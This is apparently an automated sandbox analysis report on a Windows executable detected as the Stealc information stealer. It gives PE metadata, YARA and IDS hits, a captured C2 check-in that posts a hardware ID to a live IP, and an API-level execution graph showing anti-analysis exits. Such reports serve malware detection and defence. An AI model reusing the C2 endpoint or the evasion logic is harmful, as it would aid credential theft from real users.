                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xaac000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007EFD807EB00Ah
                                pshufw mm3, qword ptr [eax+eax], 00h
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+00000000h], al
                                add byte ptr [eax], al
                                add byte ptr [edx], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x22800bfeb4566c6d87ebd710a7a5049f11e6dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x25e0000x2aa0000x2009ba1eef0f2aff503869767d78979a731unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                seldsqgz0x5080000x1a30000x1a2e00ab950336ba1c3dbe68372038087b3990False0.9948511172038198data7.953063323630895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ogrbyegi0x6ab0000x10000x600905ffb54bfb86591753c1937b881ad38False0.5423177083333334data4.817418758238148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x6ac0000x30000x22009d56e6285b980e7bfb5bf1d165d0154bFalse0.06410845588235294DOS executable (COM)0.6561681218445133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-26T08:52:26.981236+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849705185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 26, 2024 08:52:25.769180059 CEST4970580192.168.2.8185.215.113.206
                                Oct 26, 2024 08:52:25.779836893 CEST8049705185.215.113.206192.168.2.8
                                Oct 26, 2024 08:52:25.780020952 CEST4970580192.168.2.8185.215.113.206
                                Oct 26, 2024 08:52:25.780199051 CEST4970580192.168.2.8185.215.113.206
                                Oct 26, 2024 08:52:25.790601015 CEST8049705185.215.113.206192.168.2.8
                                Oct 26, 2024 08:52:26.686675072 CEST8049705185.215.113.206192.168.2.8
                                Oct 26, 2024 08:52:26.686775923 CEST4970580192.168.2.8185.215.113.206
                                Oct 26, 2024 08:52:26.689475060 CEST4970580192.168.2.8185.215.113.206
                                Oct 26, 2024 08:52:26.701966047 CEST8049705185.215.113.206192.168.2.8
                                Oct 26, 2024 08:52:26.981126070 CEST8049705185.215.113.206192.168.2.8
                                Oct 26, 2024 08:52:26.981235981 CEST4970580192.168.2.8185.215.113.206
                                Oct 26, 2024 08:52:30.099559069 CEST4970580192.168.2.8185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849705185.215.113.206807460C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 26, 2024 08:52:25.780199051 CEST90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 26, 2024 08:52:26.686675072 CEST203INHTTP/1.1 200 OK
                                Date: Sat, 26 Oct 2024 06:52:26 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 26, 2024 08:52:26.689475060 CEST413OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 45 33 44 42 36 33 36 43 31 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a
                                Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="hwid"BE3DB636C1012263180025------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build"puma------IEBAAFCAFCBKFHJJJKKF--
                                Oct 26, 2024 08:52:26.981126070 CEST210INHTTP/1.1 200 OK
                                Date: Sat, 26 Oct 2024 06:52:26 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:52:21
                                Start date:26/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xf60000
                                File size:1'872'384 bytes
                                MD5 hash:79AD5F851A1231DB208F005432D0CF1C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:9.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:10.1%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
                                  execution_graph 13094 f769f0 13139 f62260 13094->13139 13118 f76a64 13119 f7a9b0 4 API calls 13118->13119 13120 f76a6b 13119->13120 13121 f7a9b0 4 API calls 13120->13121 13122 f76a72 13121->13122 13123 f7a9b0 4 API calls 13122->13123 13124 f76a79 13123->13124 13125 f7a9b0 4 API calls 13124->13125 13126 f76a80 13125->13126 13291 f7a8a0 13126->13291 13128 f76b0c 13295 f76920 GetSystemTime 13128->13295 13130 f76a89 13130->13128 13132 f76ac2 OpenEventA 13130->13132 13134 f76af5 CloseHandle Sleep 13132->13134 13136 f76ad9 13132->13136 13137 f76b0a 13134->13137 13138 f76ae1 CreateEventA 13136->13138 13137->13130 13138->13128 13492 f645c0 13139->13492 13141 f62274 13142 f645c0 2 API calls 13141->13142 13143 f6228d 13142->13143 13144 f645c0 2 API calls 13143->13144 13145 f622a6 13144->13145 13146 f645c0 2 API calls 13145->13146 13147 f622bf 13146->13147 13148 f645c0 2 API calls 13147->13148 13149 f622d8 13148->13149 13150 f645c0 2 API calls 13149->13150 13151 f622f1 13150->13151 13152 f645c0 2 API calls 13151->13152 13153 f6230a 13152->13153 13154 f645c0 2 API calls 13153->13154 13155 f62323 13154->13155 13156 f645c0 2 API calls 13155->13156 13157 f6233c 13156->13157 13158 f645c0 2 API calls 13157->13158 13159 f62355 13158->13159 13160 f645c0 2 API calls 13159->13160 13161 f6236e 13160->13161 13162 f645c0 2 API calls 13161->13162 13163 f62387 13162->13163 13164 f645c0 2 API calls 13163->13164 13165 f623a0 13164->13165 13166 f645c0 2 API calls 13165->13166 13167 f623b9 13166->13167 13168 f645c0 2 API calls 13167->13168 13169 f623d2 13168->13169 13170 f645c0 2 API calls 13169->13170 13171 f623eb 13170->13171 13172 f645c0 2 API calls 13171->13172 13173 f62404 13172->13173 13174 f645c0 2 API calls 13173->13174 13175 f6241d 13174->13175 13176 f645c0 2 API calls 13175->13176 13177 f62436 13176->13177 13178 f645c0 2 API calls 13177->13178 13179 f6244f 13178->13179 13180 f645c0 2 API calls 13179->13180 13181 f62468 13180->13181 13182 f645c0 2 API calls 13181->13182 13183 f62481 13182->13183 13184 f645c0 2 API calls 13183->13184 13185 f6249a 13184->13185 13186 f645c0 2 API calls 13185->13186 13187 f624b3 13186->13187 13188 f645c0 2 API calls 13187->13188 13189 f624cc 13188->13189 13190 f645c0 2 API calls 13189->13190 13191 f624e5 13190->13191 13192 f645c0 2 API calls 13191->13192 13193 f624fe 13192->13193 13194 f645c0 2 API calls 13193->13194 13195 f62517 13194->13195 13196 f645c0 2 API calls 13195->13196 13197 f62530 13196->13197 13198 f645c0 2 API calls 13197->13198 13199 f62549 13198->13199 13200 f645c0 2 API calls 13199->13200 13201 f62562 13200->13201 13202 f645c0 2 API calls 13201->13202 13203 f6257b 13202->13203 13204 f645c0 2 API calls 13203->13204 13205 f62594 13204->13205 13206 f645c0 2 API calls 13205->13206 13207 f625ad 13206->13207 13208 f645c0 2 API calls 13207->13208 13209 f625c6 13208->13209 13210 f645c0 2 API calls 13209->13210 13211 f625df 13210->13211 13212 f645c0 2 API calls 13211->13212 13213 f625f8 13212->13213 13214 f645c0 2 API calls 13213->13214 13215 f62611 13214->13215 13216 f645c0 2 API calls 13215->13216 13217 f6262a 13216->13217 13218 f645c0 2 API calls 13217->13218 13219 f62643 13218->13219 13220 f645c0 2 API calls 13219->13220 13221 f6265c 13220->13221 13222 f645c0 2 API calls 13221->13222 13223 f62675 13222->13223 13224 f645c0 2 API calls 13223->13224 13225 f6268e 13224->13225 13226 f79860 13225->13226 13497 f79750 GetPEB 13226->13497 13228 f79868 13229 f79a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13228->13229 13230 f7987a 13228->13230 13231 f79af4 GetProcAddress 13229->13231 13232 f79b0d 13229->13232 13235 f7988c 21 API calls 13230->13235 13231->13232 13233 f79b46 13232->13233 13234 f79b16 GetProcAddress GetProcAddress 13232->13234 13236 f79b4f GetProcAddress 13233->13236 13237 f79b68 13233->13237 13234->13233 13235->13229 13236->13237 13238 f79b71 GetProcAddress 13237->13238 13239 f79b89 13237->13239 13238->13239 13240 f79b92 GetProcAddress GetProcAddress 13239->13240 13241 f76a00 13239->13241 13240->13241 13242 f7a740 13241->13242 13243 f7a750 13242->13243 13244 f76a0d 13243->13244 13245 f7a77e lstrcpy 13243->13245 13246 f611d0 13244->13246 13245->13244 13247 f611e8 13246->13247 13248 f61217 13247->13248 13249 f6120f ExitProcess 13247->13249 13250 f61160 GetSystemInfo 13248->13250 13251 f61184 13250->13251 13252 f6117c ExitProcess 13250->13252 13253 f61110 GetCurrentProcess VirtualAllocExNuma 13251->13253 13254 f61141 ExitProcess 13253->13254 13255 f61149 13253->13255 13498 f610a0 VirtualAlloc 13255->13498 13258 f61220 13502 f789b0 13258->13502 13261 f61249 13262 f6129a 13261->13262 13263 f61292 ExitProcess 13261->13263 13264 f76770 GetUserDefaultLangID 13262->13264 13265 f767d3 13264->13265 13266 f76792 13264->13266 13272 f61190 13265->13272 13266->13265 13267 f767b7 ExitProcess 13266->13267 13268 f767a3 ExitProcess 13266->13268 13269 f767c1 ExitProcess 13266->13269 13270 f767ad ExitProcess 13266->13270 13271 f767cb ExitProcess 13266->13271 13271->13265 13273 f778e0 3 API calls 13272->13273 13274 f6119e 13273->13274 13275 f611cc 13274->13275 13276 f77850 3 API calls 13274->13276 13279 f77850 GetProcessHeap RtlAllocateHeap GetUserNameA 13275->13279 13277 f611b7 13276->13277 13277->13275 13278 f611c4 ExitProcess 13277->13278 13280 f76a30 13279->13280 13281 f778e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13280->13281 13282 f76a43 13281->13282 13283 f7a9b0 13282->13283 13504 f7a710 13283->13504 13285 f7a9c1 lstrlen 13287 f7a9e0 13285->13287 13286 f7aa18 13505 f7a7a0 13286->13505 13287->13286 13289 f7a9fa lstrcpy lstrcat 13287->13289 13289->13286 13290 f7aa24 13290->13118 13292 f7a8bb 13291->13292 13293 f7a90b 13292->13293 13294 f7a8f9 lstrcpy 13292->13294 13293->13130 13294->13293 13509 f76820 13295->13509 13297 f7698e 13298 f76998 sscanf 13297->13298 13538 f7a800 13298->13538 13300 f769aa SystemTimeToFileTime SystemTimeToFileTime 13301 f769e0 13300->13301 13302 f769ce 13300->13302 13304 f75b10 13301->13304 13302->13301 13303 f769d8 ExitProcess 13302->13303 13305 f75b1d 13304->13305 13306 f7a740 lstrcpy 13305->13306 13307 f75b2e 13306->13307 13540 f7a820 lstrlen 13307->13540 13310 f7a820 2 API calls 13311 f75b64 13310->13311 13312 f7a820 2 API calls 13311->13312 13313 f75b74 13312->13313 13544 f76430 13313->13544 13316 f7a820 2 API calls 13317 f75b93 13316->13317 13318 f7a820 2 API calls 13317->13318 13319 f75ba0 13318->13319 13320 f7a820 2 API calls 13319->13320 13321 f75bad 13320->13321 13322 f7a820 2 API calls 13321->13322 13323 f75bf9 13322->13323 13553 f626a0 13323->13553 13331 f75cc3 13332 f76430 lstrcpy 13331->13332 13333 f75cd5 13332->13333 13334 f7a7a0 lstrcpy 13333->13334 13335 f75cf2 13334->13335 13336 f7a9b0 4 API calls 13335->13336 13337 f75d0a 13336->13337 13338 f7a8a0 lstrcpy 13337->13338 13339 f75d16 13338->13339 13340 f7a9b0 4 API calls 13339->13340 13341 f75d3a 13340->13341 13342 f7a8a0 lstrcpy 13341->13342 13343 f75d46 13342->13343 13344 f7a9b0 4 API calls 13343->13344 13345 f75d6a 13344->13345 13346 f7a8a0 lstrcpy 13345->13346 13347 f75d76 13346->13347 13348 f7a740 lstrcpy 13347->13348 13349 f75d9e 13348->13349 14279 f77500 GetWindowsDirectoryA 13349->14279 13352 f7a7a0 lstrcpy 13353 f75db8 13352->13353 14289 f64880 13353->14289 13355 f75dbe 14434 f717a0 13355->14434 13357 f75dc6 13358 f7a740 lstrcpy 13357->13358 13359 f75de9 13358->13359 13360 f61590 lstrcpy 13359->13360 13361 f75dfd 13360->13361 14450 f65960 13361->14450 13363 f75e03 14594 f71050 13363->14594 13365 f75e0e 13366 f7a740 lstrcpy 13365->13366 13367 f75e32 13366->13367 13368 f61590 lstrcpy 13367->13368 13369 f75e46 13368->13369 13370 f65960 34 API calls 13369->13370 13371 f75e4c 13370->13371 14598 f70d90 13371->14598 13373 f75e57 13374 f7a740 lstrcpy 13373->13374 13375 f75e79 13374->13375 13376 f61590 lstrcpy 13375->13376 13377 f75e8d 13376->13377 13378 f65960 34 API calls 13377->13378 13379 f75e93 13378->13379 14605 f70f40 13379->14605 13381 f75e9e 13382 f61590 lstrcpy 13381->13382 13383 f75eb5 13382->13383 14610 f71a10 13383->14610 13385 f75eba 13386 f7a740 lstrcpy 13385->13386 13387 f75ed6 13386->13387 14954 f64fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13387->14954 13389 f75edb 13390 f61590 lstrcpy 13389->13390 13391 f75f5b 13390->13391 14961 f70740 13391->14961 13393 f75f60 13394 f7a740 lstrcpy 13393->13394 13395 f75f86 13394->13395 13396 f61590 lstrcpy 13395->13396 13397 f75f9a 13396->13397 13398 f65960 34 API calls 13397->13398 13399 f75fa0 13398->13399 13493 f645d1 RtlAllocateHeap 13492->13493 13496 f64621 VirtualProtect 13493->13496 13496->13141 13497->13228 13500 f610c2 ctype 13498->13500 13499 f610fd 13499->13258 13500->13499 13501 f610e2 VirtualFree 13500->13501 13501->13499 13503 f61233 GlobalMemoryStatusEx 13502->13503 13503->13261 13504->13285 13506 f7a7c2 13505->13506 13507 f7a7ec 13506->13507 13508 f7a7da lstrcpy 13506->13508 13507->13290 13508->13507 13510 f7a740 lstrcpy 13509->13510 13511 f76833 13510->13511 13512 f7a9b0 4 API calls 13511->13512 13513 f76845 13512->13513 13514 f7a8a0 lstrcpy 13513->13514 13515 f7684e 13514->13515 13516 f7a9b0 4 API calls 13515->13516 13517 f76867 13516->13517 13518 f7a8a0 lstrcpy 13517->13518 13519 f76870 13518->13519 13520 f7a9b0 4 API calls 13519->13520 13521 f7688a 13520->13521 13522 f7a8a0 lstrcpy 13521->13522 13523 f76893 13522->13523 13524 f7a9b0 4 API calls 13523->13524 13525 f768ac 13524->13525 13526 f7a8a0 lstrcpy 13525->13526 13527 f768b5 13526->13527 13528 f7a9b0 4 API calls 13527->13528 13529 f768cf 13528->13529 13530 f7a8a0 lstrcpy 13529->13530 13531 f768d8 13530->13531 13532 f7a9b0 4 API calls 13531->13532 13533 f768f3 13532->13533 13534 f7a8a0 lstrcpy 13533->13534 13535 f768fc 13534->13535 13536 f7a7a0 lstrcpy 13535->13536 13537 f76910 13536->13537 13537->13297 13539 f7a812 13538->13539 13539->13300 13541 f7a83f 13540->13541 13542 f75b54 13541->13542 13543 f7a87b lstrcpy 13541->13543 13542->13310 13543->13542 13545 f7a8a0 lstrcpy 13544->13545 13546 f76443 13545->13546 13547 f7a8a0 lstrcpy 13546->13547 13548 f76455 13547->13548 13549 f7a8a0 lstrcpy 13548->13549 13550 f76467 13549->13550 13551 f7a8a0 lstrcpy 13550->13551 13552 f75b86 13551->13552 13552->13316 13554 f645c0 2 API calls 13553->13554 13555 f626b4 13554->13555 13556 f645c0 2 API calls 13555->13556 13557 f626d7 13556->13557 13558 f645c0 2 API calls 13557->13558 13559 f626f0 13558->13559 13560 f645c0 2 API calls 13559->13560 13561 f62709 13560->13561 13562 f645c0 2 API calls 13561->13562 13563 f62736 13562->13563 13564 f645c0 2 API calls 13563->13564 13565 f6274f 13564->13565 13566 f645c0 2 API calls 13565->13566 13567 f62768 13566->13567 13568 f645c0 2 API calls 13567->13568 13569 f62795 13568->13569 13570 f645c0 2 API calls 13569->13570 13571 f627ae 13570->13571 13572 f645c0 2 API calls 13571->13572 13573 f627c7 13572->13573 13574 f645c0 2 API calls 13573->13574 13575 f627e0 13574->13575 13576 f645c0 2 API calls 13575->13576 13577 f627f9 13576->13577 13578 f645c0 2 API calls 13577->13578 13579 f62812 13578->13579 13580 f645c0 2 API calls 13579->13580 13581 f6282b 13580->13581 13582 f645c0 2 API calls 13581->13582 13583 f62844 13582->13583 13584 f645c0 2 API calls 13583->13584 13585 f6285d 13584->13585 13586 f645c0 2 API calls 13585->13586 13587 f62876 13586->13587 13588 f645c0 2 API calls 13587->13588 13589 f6288f 13588->13589 13590 f645c0 2 API calls 13589->13590 13591 f628a8 13590->13591 13592 f645c0 2 API calls 13591->13592 13593 f628c1 13592->13593 13594 f645c0 2 API calls 13593->13594 13595 f628da 13594->13595 13596 f645c0 2 API calls 13595->13596 13597 f628f3 13596->13597 13598 f645c0 2 API calls 13597->13598 13599 f6290c 13598->13599 13600 f645c0 2 API calls 13599->13600 13601 f62925 13600->13601 13602 f645c0 2 API calls 13601->13602 13603 f6293e 13602->13603 13604 f645c0 2 API calls 13603->13604 13605 f62957 13604->13605 13606 f645c0 2 API calls 13605->13606 13607 f62970 13606->13607 13608 f645c0 2 API calls 13607->13608 13609 f62989 13608->13609 13610 f645c0 2 API calls 13609->13610 13611 f629a2 13610->13611 13612 f645c0 2 API calls 13611->13612 13613 f629bb 13612->13613 13614 f645c0 2 API calls 13613->13614 13615 f629d4 13614->13615 13616 f645c0 2 API calls 13615->13616 13617 f629ed 13616->13617 13618 f645c0 2 API calls 13617->13618 13619 f62a06 13618->13619 13620 f645c0 2 API calls 13619->13620 13621 f62a1f 13620->13621 13622 f645c0 2 API calls 13621->13622 13623 f62a38 13622->13623 13624 f645c0 2 API calls 13623->13624 13625 f62a51 13624->13625 13626 f645c0 2 API calls 13625->13626 13627 f62a6a 13626->13627 13628 f645c0 2 API calls 13627->13628 13629 f62a83 13628->13629 13630 f645c0 2 API calls 13629->13630 13631 f62a9c 13630->13631 13632 f645c0 2 API calls 13631->13632 13633 f62ab5 13632->13633 13634 f645c0 2 API calls 13633->13634 13635 f62ace 13634->13635 13636 f645c0 2 API calls 13635->13636 13637 f62ae7 13636->13637 13638 f645c0 2 API calls 13637->13638 13639 f62b00 13638->13639 13640 f645c0 2 API calls 13639->13640 13641 f62b19 13640->13641 13642 f645c0 2 API calls 13641->13642 13643 f62b32 13642->13643 13644 f645c0 2 API calls 13643->13644 13645 f62b4b 13644->13645 13646 f645c0 2 API calls 13645->13646 13647 f62b64 13646->13647 13648 f645c0 2 API calls 13647->13648 13649 f62b7d 13648->13649 13650 f645c0 2 API calls 13649->13650 13651 f62b96 13650->13651 13652 f645c0 2 API calls 13651->13652 13653 f62baf 13652->13653 13654 f645c0 2 API calls 13653->13654 13655 f62bc8 13654->13655 13656 f645c0 2 API calls 13655->13656 13657 f62be1 13656->13657 13658 f645c0 2 API calls 13657->13658 13659 f62bfa 13658->13659 13660 f645c0 2 API calls 13659->13660 13661 f62c13 13660->13661 13662 f645c0 2 API calls 13661->13662 13663 f62c2c 13662->13663 13664 f645c0 2 API calls 13663->13664 13665 f62c45 13664->13665 13666 f645c0 2 API calls 13665->13666 13667 f62c5e 13666->13667 13668 f645c0 2 API calls 13667->13668 13669 f62c77 13668->13669 13670 f645c0 2 API calls 13669->13670 13671 f62c90 13670->13671 13672 f645c0 2 API calls 13671->13672 13673 f62ca9 13672->13673 13674 f645c0 2 API calls 13673->13674 13675 f62cc2 13674->13675 13676 f645c0 2 API calls 13675->13676 13677 f62cdb 13676->13677 13678 f645c0 2 API calls 13677->13678 13679 f62cf4 13678->13679 13680 f645c0 2 API calls 13679->13680 13681 f62d0d 13680->13681 13682 f645c0 2 API calls 13681->13682 13683 f62d26 13682->13683 13684 f645c0 2 API calls 13683->13684 13685 f62d3f 13684->13685 13686 f645c0 2 API calls 13685->13686 13687 f62d58 13686->13687 13688 f645c0 2 API calls 13687->13688 13689 f62d71 13688->13689 13690 f645c0 2 API calls 13689->13690 13691 f62d8a 13690->13691 13692 f645c0 2 API calls 13691->13692 13693 f62da3 13692->13693 13694 f645c0 2 API calls 13693->13694 13695 f62dbc 13694->13695 13696 f645c0 2 API calls 13695->13696 13697 f62dd5 13696->13697 13698 f645c0 2 API calls 13697->13698 13699 f62dee 13698->13699 13700 f645c0 2 API calls 13699->13700 13701 f62e07 13700->13701 13702 f645c0 2 API calls 13701->13702 13703 f62e20 13702->13703 13704 f645c0 2 API calls 13703->13704 13705 f62e39 13704->13705 13706 f645c0 2 API calls 13705->13706 13707 f62e52 13706->13707 13708 f645c0 2 API calls 13707->13708 13709 f62e6b 13708->13709 13710 f645c0 2 API calls 13709->13710 13711 f62e84 13710->13711 13712 f645c0 2 API calls 13711->13712 13713 f62e9d 13712->13713 13714 f645c0 2 API calls 13713->13714 13715 f62eb6 13714->13715 13716 f645c0 2 API calls 13715->13716 13717 f62ecf 13716->13717 13718 f645c0 2 API calls 13717->13718 13719 f62ee8 13718->13719 13720 f645c0 2 API calls 13719->13720 13721 f62f01 13720->13721 13722 f645c0 2 API calls 13721->13722 13723 f62f1a 13722->13723 13724 f645c0 2 API calls 13723->13724 13725 f62f33 13724->13725 13726 f645c0 2 API calls 13725->13726 13727 f62f4c 13726->13727 13728 f645c0 2 API calls 13727->13728 13729 f62f65 13728->13729 13730 f645c0 2 API calls 13729->13730 13731 f62f7e 13730->13731 13732 f645c0 2 API calls 13731->13732 